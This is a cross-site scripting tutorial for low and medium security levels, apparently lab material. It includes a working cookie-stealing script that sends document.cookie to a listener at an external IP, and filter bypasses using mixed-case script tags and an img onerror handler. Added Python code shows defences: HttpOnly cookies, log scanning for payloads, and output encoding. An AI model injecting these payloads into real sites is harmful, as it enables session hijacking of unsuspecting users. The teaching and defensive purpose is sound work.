XSS Cross Site Scripting

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Low Security Example

In the case where a website or web application has no security filters on its input forms, you can simply pass plain JavaScript wrapped in script tags through the form and have the output of the code returned to you.

<script>alert('hello!')</script>

This script would open an alert window with the text 'hello!' inside.

Low Security Cookie Stealing

Using the same approach as before, we can read the document's cookies and send them to ourselves. First you'll have to set up a listener, which can be done with a simple python3 server:

python3 -m http.server 1234
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...

Next we'll prepare our script for injection:

<script type="text/javascript">document.location="http://192.168.0.1:1234/?cookies="+document.cookie;</script>

This will grab the document's cookies and send them to our Python server, where the output would look like:

python3 -m http.server 1234
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...

192.0.0.1 - - "GET /?cookies=security=low;%20PHPSESSID=ci5j12515 HTTP/1.1 200

We were able to grab the PHP Session ID cookie!
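As an added defensive example (not part of the original notes), the Python script below shows the two controls that counter the cookie-theft scenario above: issuing the session cookie with the HttpOnly attribute, so document.cookie no longer exposes it to an injected script, and scanning the application's own access log for reflected payloads, decoding the query string and matching case-insensitively so that both `<script>` and `<ScRiPt>` are caught. The log lines, paths and client addresses are constructed for the example; `script_visible_cookies` is a simplified model of browser behaviour, not a real browser.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# --- Mitigation: keep the session id out of document.cookie -------------------

def session_cookie_header(session_id):
    """Build a Set-Cookie value for the session cookie.
    HttpOnly is the attribute that matters for the cookie-theft payload:
    the browser still sends the cookie with requests, but document.cookie
    no longer returns it, so an injected script has nothing to exfiltrate."""
    return f"PHPSESSID={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


def script_visible_cookies(set_cookie_values):
    """Model (not a real browser) of what document.cookie would return for a
    list of Set-Cookie header values: every cookie except those flagged HttpOnly."""
    visible = []
    for header in set_cookie_values:
        parts = [p.strip() for p in header.split(";")]
        attributes = {p.lower() for p in parts[1:]}
        if "httponly" not in attributes:
            visible.append(parts[0])
    return "; ".join(visible)


# --- Detection: spot reflected payloads in the application's own access log ---

# Common Log Format; only the client address and the request target are needed.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Coarse markers for the two vectors shown on this page, matched case-insensitively
# after URL-decoding so that <ScRiPt> and %3Cscript%3E are both caught.
XSS_MARKERS = re.compile(
    r"<\s*script\b"                 # <script, <ScRiPt, < script
    r"|<\s*\w+[^>]*\bon\w+\s*=",    # any tag carrying an event handler such as onerror=
    re.IGNORECASE,
)

# Constructed sample log lines (assumed paths and addresses, not taken from the page).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /xss_r/?name=Bob HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /xss_r/?name=%3CScRiPt%3Ealert('hi')%3C/sCrIpT%3E HTTP/1.1" 200 640
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /xss_r/?name=%3Cimg+src%3D%22x%22+onerror%3D%22alert('Hello')%22%3E HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=javascript+tutorial HTTP/1.1" 200 300
"""


def flag_reflected_xss(log_text):
    """Return (client ip, path, parameter, decoded value) for every query parameter
    whose decoded value looks like an injected tag. A coarse triage signal, not a WAF."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_LINE.search(line)
        if not match:
            continue
        target = urlsplit(match.group("target"))
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if XSS_MARKERS.search(value):
                hits.append((match.group("ip"), target.path, name, value))
    return hits


if __name__ == "__main__":
    print(session_cookie_header("ci5j12515"))
    print("document.cookie ->",
          script_visible_cookies([session_cookie_header("ci5j12515"), "security=low; Path=/"]))
    for hit in flag_reflected_xss(SAMPLE_LOG):
        print("suspicious:", hit)
```

The log scan only sees GET parameters, so a stored or POST-delivered payload needs the request body or the application's own input logging; the regexes are deliberately narrow and will miss other vectors, which is why the HttpOnly flag (which limits the damage regardless of how the script got in) is the control to apply first.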

Medium Security Example

A case of slightly better security would be the application developer attempting to strip strings that could be malicious from the input. For example:

<?php
// Case-sensitive, single-pass blacklist: only the exact lowercase word 'script' is removed.
// The parameter name 'input' is assumed here; the original snippet did not show it.
if (isset($_GET['input'])) {
    $input = str_replace('script', '', $_GET['input']);
}

The first way to bypass this filter is simply to change the character case so that it no longer matches the exact string:

<ScRiPt>alert('hi')</sCrIpT>

The second method is to put the malicious JavaScript in an image tag's onerror handler, which fires when the image fails to load:

<img src="x" onerror="alert('Hello')">

This would be submitted to the server and, when the page is rendered, the browser would try to load it as an image. Because the source is not a real image, the load fails and the onerror handler runs, which is our malicious script.
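To make the lesson of the medium-security section concrete, here is an added Python example (not code from the original notes) that models the PHP `str_replace('script', '', ...)` blacklist with an equivalent `str.replace`, runs the three inputs from this page through it, and places it beside the defence that actually works: HTML-encoding the value at the point where it is written into the page with `html.escape`.

```python
import html


def weak_filter(user_input):
    """Model of the page's medium-security filter, str_replace('script', '', $input):
    a case-sensitive, single-pass removal of the literal word "script"."""
    return user_input.replace("script", "")


def encode_output(user_input):
    """Defence for HTML body and quoted-attribute contexts: encode the characters
    that start markup instead of guessing which words are bad."""
    return html.escape(user_input, quote=True)


def filter_is_bypassed(user_input):
    """True when the blacklist leaves the input completely untouched."""
    return weak_filter(user_input) == user_input


# The three inputs discussed on this page.
PAYLOADS = [
    "<script>alert('hello!')</script>",            # low-security payload: the filter does strip "script"
    "<ScRiPt>alert('hi')</sCrIpT>",                # case change: no lowercase "script" to match
    "<img src=\"x\" onerror=\"alert('Hello')\">",  # event handler: the word never appears
]


def compare(payloads=PAYLOADS):
    """For each input: (blacklist bypassed?, any raw '<' left after encoding?)."""
    return [(filter_is_bypassed(p), "<" in encode_output(p)) for p in payloads]


if __name__ == "__main__":
    for p, (bypassed, markup_left) in zip(PAYLOADS, compare()):
        print(f"{p!r}")
        print(f"   blacklist bypassed: {bypassed}   raw '<' after encoding: {markup_left}")
        print(f"   encoded output: {encode_output(p)}")
```

Running it shows the blacklist only touches the first payload (and even there leaves `<>alert('hello!')</>` behind), while encoding leaves no raw `<` in any of them. Making the replace case-insensitive would fix the second payload and still do nothing for the third, which is the general point: removing bad words is a losing race, whereas encoding the output for its context closes the class of bug. `html.escape` is the right encoder only for HTML text and quoted attributes; a value landing inside a script block, a URL, or a CSS rule needs the encoder for that context.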
